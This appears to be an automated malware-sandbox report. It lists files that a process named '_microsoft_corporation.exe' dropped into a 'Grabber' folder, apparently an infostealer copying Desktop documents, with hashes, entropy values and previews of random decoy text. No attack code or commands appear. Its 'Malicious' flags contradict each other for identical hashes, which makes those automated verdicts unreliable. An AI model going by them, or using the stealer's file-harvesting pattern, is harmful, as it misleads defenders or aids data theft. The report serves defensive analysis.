SSDEEP:	24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
MD5:	9A59DF7A478E34FB1DD60514E5C85366
SHA1:	DE10B95426671A161E37E5CE1AD6424AB3C07D98
SHA-256:	582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
SHA-512:	70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
Malicious:	false
Preview:	LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE

C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Grabber\DRIVE-C\Users\user\Desktop\LTKMYBSEYZ.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.687722658485212
Encrypted:	false
SSDEEP:	24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
MD5:	9A59DF7A478E34FB1DD60514E5C85366
SHA1:	DE10B95426671A161E37E5CE1AD6424AB3C07D98
SHA-256:	582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
SHA-512:	70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
Malicious:	false
Preview:	LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE

C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Grabber\DRIVE-C\Users\user\Desktop\LTKMYBSEYZ\BPMLNOBVSB.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.702896917219035
Encrypted:	false
SSDEEP:	24:/PRNNS0CSvZqsz3phzXGrOVx0E5lpmo3ntC4hUh31nnrgy:/wQvwsz3phzWrOVxXnncRh31nrgy
MD5:	C68274AA8B7F713157BEBE2FCC2EA5D3
SHA1:	52A5A2D615A813B518DDAAC2A02095F1059DAAD5
SHA-256:	362C32AB7AEE8A211871A6045DADFEBF087D5EC2A3470FBEF42BC1C0E8CF0542
SHA-512:	BB653D9E0948C2BD3586BC7CABC777BCDA84F749B73B26E4FD667C22F9629D8A7EC4F94ADBCAAF679FC116CDDA1F0D55CB348CD50BD3B6A4484F48A203E32883
Malicious:	false
Preview:	BPMLNOBVSBRFPSKLKRJEVHBRVUUOUWMMDGAHEFTOXDSJSRQBDQADKRAAIMJBBXHJZSYGDGSBIJCBPDLCIPLGVURSSGYXQXCVEDYOHFVNTWOSWAODXQUYSQDZDKFJYMCQZOAAPCNEEITKKQAOZJLGLFTYOILWUOSTJMBMUSHEQYRRGRAOIGHQXDIXRMKPCYCIDORIRGMLSPAFIUBBOMPKCNUTVROXQQMRPPEYTVHGRIWJQZREOHPNIXFSPUEZGKVJWTNJVDHDCOMTLCENQMHDIOFNLZNLPFMCGQAWNZVHKKTCZJIHININWOCQTMBLXKYEUXUUKCZAKOINULOSSFHJSGRNIDZZLUKXSJKRQIPXODCNMCWZEQEGJHTKEBKCHWRCJJEITXLWRGJUOYWSWNFVRXXLTBNUBFYSNPVKHAJAOKQIGZUIREJCJKNRVWECUBFUQVUSSEVFZFGAGLZHTJIRXFGLLTHCDJRQSVBUTENMMECBKNQAOTCGUKCAUANZSSYPURGXINFDSJOSJXFPPQOKWUJNGLOACGPRELXIXQZZNXUEJPFZQRDXMWSGEPNTSQRNGFYRRORGOCRJKMCRFZPVDFDRDZCHPWYNXBAOHXICQPOHWXUVYMEAZUMLLNZQAOCCUKTGCMNZUMKUHEIUUYFGMSIEUWOKDVUTQHRMSVPQFKZILWLKZLKCAJHKFHZJFEJAIIZQWILLXMKWLUETDBWSKQOQQECLVCWJSIQXHNDZAYVIFNNYOZKGGFZMIYUCHYFNVXUHKZCOQBJAYWMEKPQVFWNVIJXYFYHWXFXSXDCSRYIODDWXNUTAYNOXAVMATSYETUSRJPYJEQCIEGHSXOOCALKHPRGXFNWHDUNNXCXELBKBUMKTJRNZBLLQWINSTBBGQYWIVUZENAMGRAYFSSGBXLPJXWYTCERBJXCYMHQMJPSVPWCDSLLUJZTWDDJDHIADYETBWZFZQTYTPWPBFDIVVSAOFDDHMUMYLEFUUIKC

C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Grabber\DRIVE-C\Users\user\Desktop\LTKMYBSEYZ\KZWFNRXYKI.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694982189683734
Encrypted:	false
SSDEEP:	24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
MD5:	E49F84B05A175C231342E6B705A24A44
SHA1:	41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
SHA-256:	EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
SHA-512:	84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
Malicious:	false
Preview:	KZWFNRXYKIQQDFEFEKFUFTLSCHHVHHFJVLINSSPODUWFGYCFXENRRFQZQNVRFJLXTKRPVZFZUDBIVIHPJCTZSMJNOWNCQAPYYHLTMHJJYECMUWUKYXMYBEVYHAFCNHVTPHXQKEQMWLDZKOKDMDUORJRRWKHVJLZNSFERFDAFUHPRYSOCWFZCHPEXICNDGFOZLLLNASUKYIOHUBCGSHVHTAAMQFTBUNSBDIPJOCUDVCBYOUPDCATAMJESONSVVDFARQOQHDTKDRVDWNHMPSWQTCDBOSQIMASLDMFOKOIPUFJNASKNMQOVCYYFVCKNWJBVIBCWMYJGLWMAZWJABPWRYFHPZVZTRFLFKJIVQMYASPFSBODYXKEEFHBTFSHZEWSGAGGMSRRYSACIWVPBTHVGVVYONDRAYVOWBYTTLWWPGWQAJDLYFDALUZCIBUOEBMSCKJILYNBNADCKXDVTLOFEMKULPCSYYTTPBZKLBPMPEQZHPJCMRWISRYUKSYBUOCFXUPORADUTYINWCOLTVNYNBVHTATWIAMJBNCYZTMQLJOZXQMVQWJAGLZBDTPNMMKABCUCOYDSRVMYDKVJFRZRLIKSQNEMHUWIXWIACERSGEBQFEQJLXFLCITYZWKHIASCUIPVHOXQGWHFWSXEHOMVVXNFDEKOTOBBAEPJTBOCEJGWYSJBHWDRPPONMLWEDWWLGQVWLLREHLEZFZNEDNRDQMBTZWCUIFLPBHTTQGIEVFRJKMYLHMYUOCAAUGIRMYSCUPKJDFUJBVKKJHICSXHPXWUGXGPHCKBZLZXDCKURFIMZGIDDJWPBHEERWPLLCNTTKZRNYIMGHNYECXBHHHWCVILLPFPVXYOQODPYIIVKTOODIUKCMBBWHUEFORQUJCVYVBOBKKLPQJMOJEUOFUFAAJRTAZTXJJQPOORSRNCQDMHWVYQIGGCMZGYMXIBAKRNOPIPQWJHZEWBBJTYBESJTCCPYZHONYNVOXCBHCXRST

C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Grabber\DRIVE-C\Users\user\Desktop\LTKMYBSEYZ\LTKMYBSEYZ.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.687722658485212
Encrypted:	false
SSDEEP:	24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
MD5:	9A59DF7A478E34FB1DD60514E5C85366
SHA1:	DE10B95426671A161E37E5CE1AD6424AB3C07D98
SHA-256:	582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
SHA-512:	70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
Malicious:	false
Preview:	LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE

C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Grabber\DRIVE-C\Users\user\Desktop\LTKMYBSEYZ\WUTJSCBCFX.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.688284131239007
Encrypted:	false
SSDEEP:	24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
MD5:	E8ACCA0F46CBA97FE289855535184C72
SHA1:	059878D0B535AEE9092BF82886FC68DC816D9F08
SHA-256:	CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
SHA-512:	185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
Malicious:	false
Preview:	WUTJSCBCFXNSEWGLWGYOOQVVDPFNFUMPQAJVNXNKMXQRORVUIYYNQWAMOZTIZPEADOKEPDLVMNENFIICEKOTBVPODCEHVNDEMTCADGQBTUSRFDCQOFZZQCSIEKBJNREDYYVFOXFLSAVVRDBODQPUEQUZAVGFLXOWSKRTDQOYTNPZUFOPXFJPIZPUZNQGPAVLZQOLZQMEBSIDSSSOCJNYRGTGEHRLTXLSBXCVGBOIDKKEIUHPVJXFIBUKHHHIZJXBNSFVSIBUVDLJVQHLZQNPKVUYGSBYLDPVSZZIAGXVZKTZMOMHKJTCACLNIHVZQOYHZUOCHMTDPXWSWWCTZKVXUPJXTUQVYKVNBTOOXYSOQYGOROUJYIQIBLZXWHWHSDDSIDRAQBFHFUASJJFJZGJMXLKHMELZDCBSAECBJUYDLONQSYTFIGRFXVYQXQGOAYYQXFJQFPARQPKZARUFLFZALPMOXFKFAAFQYQJSBYRLXSYWILKBWNNKNPTXDFHFCBTUEWYUGEMBZMEFHNMBDRELQEYFKIFARDWZODMHWXQBTISSHAEWZTVFJRKELIBQQEXSWFZUGGGKZXSPWOXYPOCCJIHNGOPVFNWYZRPTOWAGQPVVZLHPYYBDQTUFWFIVGYOBQSXERHTUDUHOJIRJFKQQOOIXOHPHYQPYDGSQQNOEUWFVOVYMHEJBARDLGPVSTERBBBFSGVNSUAZCVAXBSTLPAQENSALLVBNGJHCERSSMMHCALJSZJJKDFYFVTEQEUIBYNZPMUJQZNJVUGNGKENCJKNBTKBYOEUUGFFKIBVHNAUHYEUNDBZPKFZERTSXYHOMVAJJBPSNOOYHZFWINWEJCFGHKIORUHARZYNBKYMOWZHDVWQBITESVLGVECBBJDDHUCWOJFWBQJSKRWHJPPGEKBDXIPJJDDYHGUCDCBZQDUVHEBPPQBUDSOAYQTNFMYUBRJNRJFSMUCNFWURFGGIHZFMXDVIINVRGXSRYXBYBI

C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Grabber\DRIVE-C\Users\user\Desktop\LTKMYBSEYZ\ZBEDCJPBEY.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6994061563025005
Encrypted:	false
SSDEEP:	24:B08PKUcagX20VoXE+FZx/9wb8CokRMdpcUuDdgyzat15b9DZd7:B00KZagXRVyEC/9wbtor+DstLbXR
MD5:	A2EF8D31A8DC8EAFB642142CAE0BDDE5
SHA1:	6D33FA6AE5C8F3D94A889AF2AFBE701A8939BD4A
SHA-256:	A63D52B4D40DE4D08B155AB05F7B239F6B826D2E9AEF65D14C536CC17B117180
SHA-512:	0183DCD7C9808191B0D67319318EDB8069F15943CD9AFFDD5D905CA66471A301A3745EC2BDA93FD30400A08856F9530F8DB8A91555E910534E43591DE6588680
Malicious:	true
Preview:	ZBEDCJPBEYDZQGCVTGMBDASCMXWLERZBJTKXMSCERSGFDONQAMYGDFYKFYLRRNDSSGOWCSVJIWIVRJNDSQXJTTMAXVCSRDVBHJTJAHTUGCUAWHWEVTZMXBFFYFUVEYDCLBXZZXFGQTWOJCECEYXZGEOOJDMVGMJIBYUFGTAXZQFDALIISPEXNBMVCNQHJOUZVXMSFGVMMJSOTYBAIBARXRQIHGTHEJLHLQYVFLCLOFZPJJNGWGUFEFWDITXPCXBOEGYNGVEMPRSJBIUABRWYDIZIOEKFMGKERRXNEAUHHIGKJGZYYHOPIKNRRYEAZLMNYDGFIVIJPYMXKETIZCKXHUZFXIJHQQDRCSLMJZZJXMQYZJYWLCENOBYZRKIPDNTOCZBITNJXYFHPKLDLFNFTFPITPPGJYNAUOBLGWYVHPFDVDMRFKRTPDBLSNIHQBPMARNFKQAQJVIEOLDVNQKQXMHUIECHHCBWWKMSQPKKMTKTWVWEBVUAXWNLNMYEUBMGCGJTOJRQFGGHHLUDCSUNVREFGQLVZNTOMRGHSGVZCIEDGKHHTKATGJQYWMOXACOPMCHXJXNTBTSGCPUUSQVNCDVHCIQKUJWVUTGDNGWDNLQEWLMNYLKNVSFDBBIZZEHCDIMOJGCOBQZDWJNJPIEFNVWHFQSCSHGUQLBIQCMTBTOMPFZRCNWPIJILMFSCYXDRTMSMAVJZZGQJTZZACHQUIBTKCMOKJBPDOKJYCHADHETFJAVZAQIIWZRRGFSBGIIPYXFQSZKQPWXQCYERZGATQXEDAHDYBYZVROOBTIZFDOMRDVIUBHXTQOKCVSRLAYYMSBYFDGLRDCLXUKSNRGYDRFKSMAJGRBMDZLACAAKDZLPQZCVGELWTWVKPXDEMWCSQNQCJWQNLMOGJVDBANJWFKRRBFXUWVSMZLFJYCUJJORXEFPORKQLYKBMUOVWZKWNAHBCKBBJIYVVDQNIPFQZUTPFKYIRDTGOBWONUYXDVC

C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Grabber\DRIVE-C\Users\user\Desktop\NWTVCDUMOB.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696250160603532
Encrypted:	false
SSDEEP:	24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
MD5:	2B6A90B7D410E3A4E2B32C90D816B4FE
SHA1:	B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
SHA-256:	D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
SHA-512:	03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
Malicious:	false
Preview:	NWTVCDUMOBTPRQQPHXQLIMGPJXTEMPBNYLBFKQFUEVGISJSVQRMPMZSAYEYQSOTUAJFILXLTKFEVHLSAMYEEFLNJSHLTTFXRTDNUGXEFIGVCAWPMDNUICDIZGPHMESKWSMUPNOFEVXFTSHSKLCVHQTNKDHDMDRJOUTEUSCAUAVMVBMOSYKKRPPZYFUGXFXWMWRACKFCQOUHITLUCHGFZEOIPNCJFJOVBZIKDRNERXOSPKSRMHKTJUGFEOONFWLVNTJWXUFPADWYIUDKAZQXCZRFPUQQAMRTIOEHUDTLGOWYMIDOZAXTLGVEGUCQLJZGMIEQYOLWEMSGZUBWXOIBQEMQLQVGRBTUICFCEJGFTZRZCKJQEMATEONIMJKBYGQYDYXOLLROWXGYCNCVPTMRZSMMSZXKMNPSCJJJKKNRAJXGSLZNKJRJRGMCCCBCIGTLTFKNVDVIHYLGRNXDVIVWBCPNKNIFJAPQQWDQQEDDKNHVJRQJTKCUADORWREEDYTVFAOWHPNXWSNAJCVXCLLTNQPMJQHDILFNQUZJZZJJMMNDNGEBEGSTVAGZJMSMZHWJKNIAFGBUYMVADKCVLDGFQETUZXGUOUWXBBPNOWFERKMKMPOXIOTKJERPVXJGCIUKAGDGITLFYRIBAPKRESMNOMTVTZCXMODUUIGFMEMBMGAGXFZGAAZFCXDWBKKCPUKFFNMVKDFFVZYWKEKBWMADWDZXUIOOLCLIACESGRBJRSMXKUSOKXJEICCPRFWSISDTKVTDVAYSWLRHTWJGCXQMNITQJHCBMSCDRWKMGADWILLATOPVPILEQQGAIPRRUCJFTRRSSWITQKIWJOATZOBETZDBBWAIJIOXCUQSILQHQKEZXWFWWNVEWKZCGFYPBDSDBSFAZDZFRHJBZIGOZCVUGODUTNCDHKKMFHSYKUSFSXOMOUXZYOSUZNJQBXAVPOBTVBINMSIPYONLYRKIHONKWHSUAJWIALOTZAQJSNTIH

C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Grabber\DRIVE-C\Users\user\Desktop\WUTJSCBCFX.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.688284131239007
Encrypted:	false
SSDEEP:	24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
MD5:	E8ACCA0F46CBA97FE289855535184C72
SHA1:	059878D0B535AEE9092BF82886FC68DC816D9F08
SHA-256:	CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
SHA-512:	185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
Malicious:	true
Preview:	WUTJSCBCFXNSEWGLWGYOOQVVDPFNFUMPQAJVNXNKMXQRORVUIYYNQWAMOZTIZPEADOKEPDLVMNENFIICEKOTBVPODCEHVNDEMTCADGQBTUSRFDCQOFZZQCSIEKBJNREDYYVFOXFLSAVVRDBODQPUEQUZAVGFLXOWSKRTDQOYTNPZUFOPXFJPIZPUZNQGPAVLZQOLZQMEBSIDSSSOCJNYRGTGEHRLTXLSBXCVGBOIDKKEIUHPVJXFIBUKHHHIZJXBNSFVSIBUVDLJVQHLZQNPKVUYGSBYLDPVSZZIAGXVZKTZMOMHKJTCACLNIHVZQOYHZUOCHMTDPXWSWWCTZKVXUPJXTUQVYKVNBTOOXYSOQYGOROUJYIQIBLZXWHWHSDDSIDRAQBFHFUASJJFJZGJMXLKHMELZDCBSAECBJUYDLONQSYTFIGRFXVYQXQGOAYYQXFJQFPARQPKZARUFLFZALPMOXFKFAAFQYQJSBYRLXSYWILKBWNNKNPTXDFHFCBTUEWYUGEMBZMEFHNMBDRELQEYFKIFARDWZODMHWXQBTISSHAEWZTVFJRKELIBQQEXSWFZUGGGKZXSPWOXYPOCCJIHNGOPVFNWYZRPTOWAGQPVVZLHPYYBDQTUFWFIVGYOBQSXERHTUDUHOJIRJFKQQOOIXOHPHYQPYDGSQQNOEUWFVOVYMHEJBARDLGPVSTERBBBFSGVNSUAZCVAXBSTLPAQENSALLVBNGJHCERSSMMHCALJSZJJKDFYFVTEQEUIBYNZPMUJQZNJVUGNGKENCJKNBTKBYOEUUGFFKIBVHNAUHYEUNDBZPKFZERTSXYHOMVAJJBPSNOOYHZFWINWEJCFGHKIORUHARZYNBKYMOWZHDVWQBITESVLGVECBBJDDHUCWOJFWBQJSKRWHJPPGEKBDXIPJJDDYHGUCDCBZQDUVHEBPPQBUDSOAYQTNFMYUBRJNRJFSMUCNFWURFGGIHZFMXDVIINVRGXSRYXBYBI

C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Grabber\DRIVE-C\Users\user\Desktop\WUTJSCBCFX.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.688284131239007
Encrypted:	false
SSDEEP:	24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
MD5:	E8ACCA0F46CBA97FE289855535184C72
SHA1:	059878D0B535AEE9092BF82886FC68DC816D9F08
SHA-256:	CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
SHA-512:	185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
Malicious:	false
Preview:	WUTJSCBCFXNSEWGLWGYOOQVVDPFNFUMPQAJVNXNKMXQRORVUIYYNQWAMOZTIZPEADOKEPDLVMNENFIICEKOTBVPODCEHVNDEMTCADGQBTUSRFDCQOFZZQCSIEKBJNREDYYVFOXFLSAVVRDBODQPUEQUZAVGFLXOWSKRTDQOYTNPZUFOPXFJPIZPUZNQGPAVLZQOLZQMEBSIDSSSOCJNYRGTGEHRLTXLSBXCVGBOIDKKEIUHPVJXFIBUKHHHIZJXBNSFVSIBUVDLJVQHLZQNPKVUYGSBYLDPVSZZIAGXVZKTZMOMHKJTCACLNIHVZQOYHZUOCHMTDPXWSWWCTZKVXUPJXTUQVYKVNBTOOXYSOQYGOROUJYIQIBLZXWHWHSDDSIDRAQBFHFUASJJFJZGJMXLKHMELZDCBSAECBJUYDLONQSYTFIGRFXVYQXQGOAYYQXFJQFPARQPKZARUFLFZALPMOXFKFAAFQYQJSBYRLXSYWILKBWNNKNPTXDFHFCBTUEWYUGEMBZMEFHNMBDRELQEYFKIFARDWZODMHWXQBTISSHAEWZTVFJRKELIBQQEXSWFZUGGGKZXSPWOXYPOCCJIHNGOPVFNWYZRPTOWAGQPVVZLHPYYBDQTUFWFIVGYOBQSXERHTUDUHOJIRJFKQQOOIXOHPHYQPYDGSQQNOEUWFVOVYMHEJBARDLGPVSTERBBBFSGVNSUAZCVAXBSTLPAQENSALLVBNGJHCERSSMMHCALJSZJJKDFYFVTEQEUIBYNZPMUJQZNJVUGNGKENCJKNBTKBYOEUUGFFKIBVHNAUHYEUNDBZPKFZERTSXYHOMVAJJBPSNOOYHZFWINWEJCFGHKIORUHARZYNBKYMOWZHDVWQBITESVLGVECBBJDDHUCWOJFWBQJSKRWHJPPGEKBDXIPJJDDYHGUCDCBZQDUVHEBPPQBUDSOAYQTNFMYUBRJNRJFSMUCNFWURFGGIHZFMXDVIINVRGXSRYXBYBI

C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Grabber\DRIVE-C\Users\user\Desktop\YPSIACHYXW.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.700014595314478
Encrypted:	false
SSDEEP:	24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
MD5:	960373CA97DEDBA8576ECF40D0D1E39D
SHA1:	E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
SHA-256:	501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
SHA-512:	93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
Malicious:	true
